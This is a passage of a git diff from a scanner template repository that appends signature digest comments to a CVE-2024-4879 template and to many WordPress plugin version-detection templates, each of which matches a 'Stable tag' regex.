+ http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index 133e72f7f3..673df20aa5 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -46,3 +46,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502205fffb19b088bd6aacae4eff5e3e51db761eda582f4957a4863f4865611e45f570221009cff96f5dc1de26ba5a1c59fb1b01f53e7232c87aaba8322b8439f45d687b9f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..1f058d7d22 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203cfd657a163a51d6ea5d1ffcace355c3bbeac4b88e3f98ea005875c14ee6a446022100c281f7d2ca8628b2c9e03cbcac9fb2d89f1a37b04a98bdf15d8de42296ca8516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..c796735b9f 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203bd1df3450f4408d403e3c8647a83f2d10f3e5a538fcbd739252b55912f3ad660220711d63a5c1740ea635f331f1b395e5a6162d424eb6355a034bbb4c81e6a20ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..c947705607 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b7c4c23e9b78175f133be8fb3a5b364077942891083eb47188644b8b193256102203475786d505db3a5cea85b2a68d2b8041f8e2c992cd3fc63ee3be7d0ad0e93f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..a359ada3b0 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f273d9bb5a5800db9cb409844d00d78fec4a3cea580c1ce0ad8419cce74ab1302206d356f2cd8d9d88b8770c1c0343c06a9c7f26b1a9f0c40875974d2237ecf1b70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..edb8c235cc 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005f9bd434ae860d0557451f0955d772f8d3d4a6622a122158a98e77dd6b44e9f02203515951e0defd8f8386ca32042e6112d2708fa83b1bfc1f3d6d427da9e0d8597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..94110d9aa1 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0af74aa1b0309f5f438b3219709da1eca95f8d8d473f45e679bcce400a0276f022100f6f8455d8e61ec5ea15f6036489a9854902711ae3e1b492d9719cbdf2eb58dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..cedf65eabb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e719c69eeb2e8afe161ed7df2ccb1b55e7e4e1a0279789d9c475349f6517eb8022100f4e5c711c932341c099166d06e5fdb5f734b77e158e11beaff0b0b721f5d1012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..598684daa0 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bd909cf9f7b3096c8bb2b372fa088ee47b02a656ac46253a8244307004b78e1502203ee92b615ece2db70a6dc51aa0d40f58ef8ba311c7253f157aeb43dcba10a1bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..9fe7ad453a 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206400dd13973b38a453d36677d8ad8cc9b3d4a18be4fa521345cb7b12fc415eba02201fe575039bef790f887e3f9add5b06a528b8022e1007b3e06a17757a90f6c169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..e828f8a27d 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022036d7f2d8592acc18f02485d2f1b8f31c0cfce605bc8db078ebaaacd6cee099cb022100f21655e844531bff9b3d54519ea56c368305ab0e0fba6fbd9040974521c08b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..7f3d77e420 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220486205af7a7b8c46fde8599d0d373ee29a1594b501e6cd2b16c8ec0cf85261a60220108403c89e0d01edbdd0a09144a651405ab7171484efd8477ea3793c5e73b3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..0e6dea51ee 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009ca7266615490f6cdcf6ae734764dceb565b777b8a70a9fb3130d3252b2d8f902202b11fc679bb0290b4b57ab07600cdf83ddcc0563f830c6e051f34630d2287c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..79f1720d4c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ab2d665d93a87ea30cfe859028d03e196e6bdd9665c7d8a737f5b192b345966022100d680e25c8038126ba7f6fed82a471a23ceb608eaf56f7822e7f484fa30271373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..aaf2cfcb3e 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b8929c38bc16bc860b0c60bb47e3c1488fca117dec3d9ca4d0192b305d18740a02200f863bb1cb74b3fb0e190cdfff4d327d3f156cd1b27dab27cbe0f73a8f5a1045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..f6cab36458 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f1ceb9e6b1250ee01679ec431db13f5197e09ea9f99c85900226ac03a044fff02210088bba8a371519726dd341bca5c9cb3f4ab86ba0aebdc9b4c97b6d84233327dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..a353721a9e 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206427cd8cead5e3e240698c81c7c8c3e9dbf09bb46ba30ce09f0ff3fff274d7c6022012c38f3b956383be24018adbc679d5c6d96ab4fabdba43035795f91d162d3b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..5367ef60cf 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009eeb775c55bd4b3535d970b3b036c266f8dd0c87df12189ad70139f98da03527022100a904e15843f148fa55bed792fa3a82b2f2c5b076f8ce37713c3f7e990d824083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..6b067af85f 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206730b8bc898affd0ce3da1830f8b895a487f0f41d843ba269827e725dc2313a6022100b06ed2403148a76e21a5e652a924bc378da04d4aa0a692bcb7334f36010234e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..155c160466 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085bc5cb80bcc35b1e9a5f6cce4806183cc13930f4b4be3e08aa8f5daae4b8ba2022100cea47ae1afd3b8b5c6fb1ae2bda64379ef45001e2075791c76c979ef83931a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..bac2767798 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ab49e179d8f0bb56970358efcce70a076d6e6822d4e14dc472aa146e69baae4e02204e6f9459827aadbcc3f58a059811dcbc50362bb6269331c7f53bd4e7b1353fec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..6a19758c87 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039ffae78b313888a856bf07ac7cf587bff1d491d20175933cb997e205514d62a02200e0739c11cce30e3c1c78d7a19f3ecc82941fd6dc9a970d37484e48b753cd609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..e732ea1afb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b75a45b3a2be7ca5f806385e92a0e261f648c32945891386705cfffcfca005d8022100c7b46bbd85fbbaae2d20fe9bba37fc0e64653246cb594d5d963b694fdcbd7b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..6605bc370b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5f6bcfa0b12bde2be684f09b34ac954eb9db81c9a354ddaf534f3b62479eaab022100bbde1a6a03f03e2a757933d2e39b250fe605dfd93ece4a56a3563261c29ac3f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..2ee534e692 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e35d05afe05a5b9f11304c44f8235a64145a40cb91de093c59a8a3c3d3a0900c0220465eb9d24e37135cadd08088b13210642fd580c27f663797e10703bc58749400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..b173eab2a5 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100893564c7a7c46cdeccf0e33330f66ace91664fd30c6b7766f14d56e4eeae93d002202b828f229d9881e37efb7d65107d633d1400448964dac235f213c2bbc158ab9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..47224616ed 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008857696ca5eea0797d763a2bdab2cee863947306d0c58524e01e6ec49a0da9c60221009403163d87ad72265bb94a8cdaed63598a65cd93bdc7bd832a548b17027cd64a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..fe640cffcf 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 